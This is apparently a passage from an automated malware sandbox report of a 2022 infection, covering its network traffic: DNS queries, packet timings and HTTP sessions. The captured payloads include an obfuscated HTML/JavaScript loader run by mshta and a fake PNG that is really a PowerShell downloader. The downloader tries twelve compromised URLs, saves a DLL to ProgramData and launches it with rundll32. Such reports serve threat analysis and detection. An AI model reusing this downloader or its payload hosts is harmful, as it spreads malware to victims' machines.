                                                                                                                                                          Jan 29, 2022 00:14:52.735349894 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.737112999 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737143993 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737166882 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737188101 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737198114 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.737211943 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737222910 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.737235069 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737257957 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737265110 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.737281084 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737303019 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737309933 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:52.737324953 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737344980 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:52.737355947 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:53.005868912 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:55.897238016 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:55.899502039 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:15:33.471713066 CET804916691.240.118.172192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:15:33.471811056 CET4916680192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:16:08.501727104 CET4916680192.168.2.2291.240.118.172
                                                                                                                                                          Jan 29, 2022 00:16:08.563065052 CET804916691.240.118.172192.168.2.22

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 29, 2022 00:14:28.510279894 CET5216753192.168.2.228.8.8.8
                                                                                                                                                          Jan 29, 2022 00:14:28.530721903 CET53521678.8.8.8192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:49.789092064 CET5059153192.168.2.228.8.8.8
                                                                                                                                                          Jan 29, 2022 00:14:49.807781935 CET53505918.8.8.8192.168.2.22

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                          Jan 29, 2022 00:14:28.510279894 CET192.168.2.228.8.8.80x8553Standard query (0)hostfeeling.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 29, 2022 00:14:49.789092064 CET192.168.2.228.8.8.80xaa33Standard query (0)jurnalpjf.lan.go.idA (IP address)IN (0x0001)

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                          Jan 29, 2022 00:14:28.530721903 CET8.8.8.8192.168.2.220x8553No error (0)hostfeeling.com164.90.147.135A (IP address)IN (0x0001)
                                                                                                                                                          Jan 29, 2022 00:14:49.807781935 CET8.8.8.8192.168.2.220xaa33No error (0)jurnalpjf.lan.go.id103.206.244.105A (IP address)IN (0x0001)

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • 91.240.118.172
                                                                                                                                                          • jurnalpjf.lan.go.id

                                                                                                                                                          HTTP Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          0192.168.2.224916591.240.118.17280C:\Windows\System32\mshta.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 29, 2022 00:14:24.156452894 CET0OUTGET /gg/ff/fe.html HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                          Host: 91.240.118.172
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 29, 2022 00:14:24.216399908 CET2INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx/1.20.2
                                                                                                                                                          Date: Fri, 28 Jan 2022 23:14:24 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Data Raw: 32 62 32 65 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 5b 30 5d 3d 27 25 36 44 5c 31 37 30 25 33 38 25 33 38 25 33 33 25 33 34 25 33 34 25 34 31 27 20 20 20 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7d 0c 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 19 7f 36 7f 31 7f 79 7f 25 7f 33 7f 37 7d 24 7f 44 7d 1d 7d 26 7f 32 7d 26 7f 33 7f 42 7d 20 7f 31 7d 19 7f 37 7f 31 7d 24 7f 38 7d 5c 27 7d 19 7f 32 7f 33 7f 25 7f 37 7f 34 7d 06 7d 19 7f 35 7f 36 7f 25 7f 36 7d 2a 7f 45 7f 66 7d 20 7f 32 7d 3e 7f 37 7f 6d 7f 43 7f 68 7d 41 7f 31 7f 72 7f 25 7f 34 7f 33 7d 48 7d 19 7f 34 7f 34 7f 65 7d 1d 7d 35 7f 33 7d 33 7f 33 7d 39 7f 32 7f 43 7d 24 7d 5b 7f 30 7d 1d 7f 39 7d 24 7f 42 7d 45 7f 31 7f 35 7f 37 7d 4f 7f 32 7d 35 7f 36 7d 64 7f 33 7d 28 7f 33 7d 62 7d 2d 7f 69 7d 24 7d 5f 7f
                                                                                                                                                          Data Ascii: 2b2e<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'}\\162%20}61y%37}$D}}&2}&3B} 1}71}$8}\'}23%74}}56%6}*Ef} 2}>7mCh}A1r%43}H}44e}}53}33}92C}$}[0}9}$B}E157}O2}56}d3}(3}b}-i}$}_
                                                                                                                                                          Jan 29, 2022 00:14:24.216447115 CET3INData Raw: 33 7d 1c 7d 5a 7d 24 7d 2c 7d 6f 7f 42 7d 41 7d 64 7f 32 7d 7e 7c 01 7d 63 7d 3a 7d 2e 7d 1a 7d 30 7f 31 7d 32 7d 7b 7d 1d 7d 7e 7d 70 7f 71 7d 31 7d 5b 7d 35 7f 37 7d 71 7d 7e 7f 36 7d 40 7f 37 7f 35 7d 3e 7f 36 7f 63 7d 3a 7f 34 7f 69 7d 48 7d
                                                                                                                                                          Data Ascii: 3}}Z}$},}oB}A}d2}~|}c}:}.}}01}2}{}}~}pq}1}[}57}q}~6}@75}>6c}:4i}H}AE}}|}:}o}@}l|7Bif}X}1d}Hcument}E}T4o|||6|8M}S1}U}T5}|(|(|1| 6}9|@|7|92Ea}>4|V|*|}Uo}T|O5|6|!|REwr}>1t|G|/}2||2}d|}:
                                                                                                                                                          Jan 29, 2022 00:14:24.216484070 CET4INData Raw: 2d 78 7b 7e 48 78 7e 78 30 7f 36 78 32 7f 3e 7f 54 7f 68 78 47 7f 73 77 5c 6e 7f 72 79 5a 7f 20 78 2a 78 1f 7f 20 7f 6f 7f 66 7f 20 7f 74 7f 68 7f 69 7f 73 7f 20 7b 57 7a 73 7f 20 77 25 77 5c 27 77 09 78 09 7f 63 78 09 78 5c 27 7f 62 7f 79 7f 20
                                                                                                                                                          Data Ascii: -x{~Hx~x06x2>ThxGsw\nryZ x*x of this {Wzs w%w\'wxcxx\'by <b~gxJxCxExxwx} xFCCw~#~% Guardx]nyzxJ~g/w6w4brww ul~2maxw"ox+w`w,ow.t yw wE~&wexZiw]zssxZJa} }p{&twt wv}y|xw~
                                                                                                                                                          Jan 29, 2022 00:14:24.216530085 CET6INData Raw: 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 2b 3d 27 32 7e 34 78 53 7f 6e 7e 34 7f 65 78 7a 78 2b 77 0f 77 3f 77 7a 62 77 42 78 32 7e 09 7f 72 7a 17 78 16 7e 70 7e 40 7f 2f 7e 42 7f 77 7f 2e 7f 70 77 2d 76 1a 76 47 7f 2e 78 2a 7f 6d 78 1b 78 5c 72
                                                                                                                                                          Data Ascii: 2KcI8HWQPA8[0]+='2~4xSn~4exzx+ww?wzbwBx2~rzx~p~@/~Bw.pw-vvG.x*mxx\r~Ixdx_x~.kx#wTw7vv0w;xIvxLxNxPxRxTxVxXxZx\\x^wkxaxcxexgsxixkxmfxoxq~0xtxvxxv?x|x~vCwC0wwwwww\rv@w>x/0x1x">vM.Pw-WwJv&vUwOvwQw6yzawQ~du#v-/x
                                                                                                                                                          Jan 29, 2022 00:14:24.216573954 CET7INData Raw: 28 71 38 7e 58 73 4b 78 66 78 6c 7e 5c 27 7f 3a 73 14 72 44 71 13 7b 69 71 15 7f 28 7f 37 7f 39 7f 2c 71 50 71 52 71 51 7b 21 71 52 73 36 71 56 71 59 71 58 71 5b 71 57 75 2d 77 55 7d 7a 62 7f 6b 7f 3b 71 46 78 47 7f 32 71 49 72 66 74 05 7f 65 72
                                                                                                                                                          Data Ascii: (q8~XsKxfxl~\':srDq{iq(79,qPqRqQ{!qRs6qVqYqXq[qWu-wU}zbk;qFxG2qIrfterrqMru38,47qoqq}hqo1s75,qQqQ{qwqwq^vGaqaqc 3qfqKqiqru0,qmpqnqtqQpqy,q|qt}hqq`qbtxG4pu0qLrtqp\rqpqrq}z-q}qzp2q}p;q_pu.zawZtpqhqjp!
                                                                                                                                                          Jan 29, 2022 00:14:24.216612101 CET9INData Raw: 25 32 39 25 32 43 25 36 43 25 33 30 25 33 44 6e 25 36 35 5c 31 36 37 25 32 30 5c 31 30 31 25 37 32 72 5c 31 34 31 25 37 39 25 32 38 25 32 39 25 32 43 49 25 36 43 25 33 44 25 33 31 25 33 32 25 33 38 25 33 42 64 5c 31 35 37 25 37 42 6c 25 33 30 25
                                                                                                                                                          Data Ascii: %29%2C%6C%30%3Dn%65\167%20\101%72r\141%79%28%29%2CI%6C%3D%31%32%38%3Bd\157%7Bl%30%5B%49l%5D%3D%53tr%69\156g%2EfromCh\141%72Co\144%65%28Il%29%7D\167%68%69%6Ce%28%2D%2DI%6C%29%3BIl%3D%31%32%38%3Bl%31%5B%30%5D%3D%6Ci%3Dl%30%5Bl%37%5B%30%5D%5D%3B%
                                                                                                                                                          Jan 29, 2022 00:14:24.216658115 CET10INData Raw: 34 7f 53 7f 69 78 0f 73 2a 70 43 6f 58 6d 18 7f 28 7f 78 7f 75 7f 75 6e 62 6d 62 6d 21 72 31 6f 29 73 4b 7f 72 7f 3d 6f 40 77 23 6e 52 7e 2e 78 03 74 4c 75 2d 7f 64 70 37 7f 20 7f 44 6e 6d 6c 10 75 67 6f 69 6f 1a 74 1b 74 24 6f 2a 6c 34 73 4b 7f
                                                                                                                                                          Data Ascii: 4Sixs*pCoXm(xuunbmbm!r1o)sKr=o@w#nR~.xtLu-dp7 Dnmlugoiott$o*l4sKo=s(}y(s,s.}Ks1s3(lroBfx,pzr*25+{?n]lxG{kks,ks>kd*ospB+\'tDosOou;k/k1=ol1klOkk2k.k4tVtOtQx7k5lp{y}w xtXvN}dExc|8Lw%vztw\'wz
                                                                                                                                                          Jan 29, 2022 00:14:24.216698885 CET11INData Raw: 7f 2e 7e 3e 7f 69 75 2c 67 4d 67 59 7f 28 7f 38 67 63 67 5f 67 73 78 18 7f 34 67 5d 67 2e 7f 22 78 61 7e 7d 69 41 6f 67 77 79 7f 61 74 18 7f 73 77 26 78 39 7f 43 6c 0b 7f 65 68 52 7f 6a 68 56 6f 6d 67 56 7f 29 69 41 7f 63 66 12 7f 76 67 58 67 61
                                                                                                                                                          Data Ascii: .~>iu,gMgY(8gcg_gsx4g]g."xa~}iAogwyatsw&x9ClehRjhVomgV)iAcfvgXga(gssEg]gwffg^g`s>5pBffff9f#ff\'ff)yx+gsf,f+f&f(f}iyxf1s>xs~f.frgzf7s}pf?gysgx0s~fB08fDf<fIf3s>}xf\nffs.R}wfgMgDbgFnxZffJi_gNx,x
                                                                                                                                                          Jan 29, 2022 00:14:24.216737986 CET12INData Raw: 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 62 33 52 5a 34 44 32 78 42 50 77 20 20 20 28 62 31 37 64 37 51 4c 42 68 38 67 68 29 3b 68 57 50 44 66 35 6c 74 53 37 4d 59 37 32 59 32 34 34 20 20 20 20 28 78 32 63 56 58 6c 33 39 29 3b 67 38 35
                                                                                                                                                          Data Ascii: (b17d7QLBh8gh);b3RZ4D2xBPw (b17d7QLBh8gh);hWPDf5ltS7MY72Y244 (x2cVXl39);g85tUx8O57Sri34='vE7JOE4YL7z2BEimBE630IL966M' ;eval(unescape('%71%79%36%28%22%63%37%39%38%66%62%36%39%66%22%29%3B'));cG3XHY59bDjh8i5+='syQqJrqlvQcnJERouTsFYMXOqfK
                                                                                                                                                          Jan 29, 2022 00:14:24.216768026 CET12INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          1192.168.2.224916691.240.118.17280C:\Windows\System32\mshta.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 29, 2022 00:14:28.408085108 CET13OUTGET /gg/ff/fe.png HTTP/1.1
                                                                                                                                                          Host: 91.240.118.172
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 29, 2022 00:14:28.471710920 CET14INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx/1.20.2
                                                                                                                                                          Date: Fri, 28 Jan 2022 23:14:28 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1199
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT
                                                                                                                                                          ETag: "4af-5d6a59dbe5e00"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 73 65 65 64 61 7d 3a 5c 50 72 7b 73 65 65 64 61 7d 6f 67 72 61 6d 44 7b 73 65 65 64 61 7d 61 74 61 5c 7b 73 65 65 64 61 7d 4a 6f 6f 53 65 65 2e 64 7b 73 65 65 64 61 7d 6c 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 73 65 65 64 61 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 68 6f 73 74 66 65 65 6c 69 6e 67 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 34 58 73 6a 74 4f 54 37 63 46 48 76 42 56 33 48 5a 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 75 72 6e 61 6c 70 6a 66 2e 6c 61 6e 2e 67 6f 2e 69 64 2f 61 73 73 65 74 73 2f 69 4d 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 69 74 2d 6f 2e 62 69 7a 2f 62 69 74 72 69 78 2f 78 6f 44 64 44 65 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 62 69 6d 65 73 61 72 61 79 65 6e 6f 76 69 6e 2e 69 72 2f 77 70 2d 61 64 6d 69 6e 2f 47 31 70 59 47 4c 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 67 61 72 64 65 6e 69 6e 67 66 69 6c 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 63 4d 56 55 59 44 51 33 71 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 64 61 69 73 79 2e 73 75 6b 6f 62 75 72 75 2d 73 65 63 75 72 65 2e 63 6f 6d 2f 38 70 6c 6b 73 2f 76 38 6c 79 5a 54 65 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 72 6f 70 65 72 74 79 2d 65 67 2e 63 6f 6d 2f 6d 6c 7a 6b 69 72 2f 39 37 76 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 6f 74 61 6c 70 6c 61 79 74 75 78 74 6c 61 2e 63 6f 6d 2f 73 69 74 69 6f 2f 44 67 6b 74 4c 33 7a 64 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 78 74 64 65 76 65 6c 6f 70 65 72 2e 63 6f 6d 2f 6f 6b 77 39 79 78 2f 47 63 32 38 5a 58 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 61 62 6c 72 2e 63 6f 6d 2f 65 6c 65 6e 63 74 69 63 2f 66 4d 46 74 52 72 62 73 45 58 31 67 58 75 33 5a 31 4d 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 63 74 69 76 65 74 72 61 69 6e 69 6e 67 2e 73 79 74 65 73 2e 6e 65 74 2f 6c 69 62 72 61 72 69 65 73 2f 38 73 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 75 64 61 6e 67 74 61 73 6f 72 69 63 68 69 6e 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 47 47 30 31 63 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d
                                                                                                                                                          Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }
                                                                                                                                                          Jan 29, 2022 00:14:28.471724987 CET14INData Raw: 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74
                                                                                                                                                          Data Ascii: catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\JooSee.dll',ssAAqq;


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          2192.168.2.2249168103.206.244.10580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 29, 2022 00:14:49.986639977 CET15OUTGET /assets/iM/ HTTP/1.1
                                                                                                                                                          Host: jurnalpjf.lan.go.id
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 29, 2022 00:14:50.175324917 CET17INHTTP/1.1 200 OK
                                                                                                                                                          Date: Fri, 28 Jan 2022 23:14:50 GMT
                                                                                                                                                          Server: Apache/2.4.6 (CentOS) PHP/7.4.27
                                                                                                                                                          X-Powered-By: PHP/7.4.27
                                                                                                                                                          Set-Cookie: 61f478ea13105=1643411690; expires=Fri, 28-Jan-2022 23:15:50 GMT; Max-Age=60; path=/
                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          Last-Modified: Fri, 28 Jan 2022 23:14:50 GMT
                                                                                                                                                          Expires: Fri, 28 Jan 2022 23:14:50 GMT
                                                                                                                                                          Content-Disposition: attachment; filename="S2TSbn.dll"
                                                                                                                                                          Content-Transfer-Encoding: binary
                                                                                                                                                          Content-Length: 548864
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-msdownload
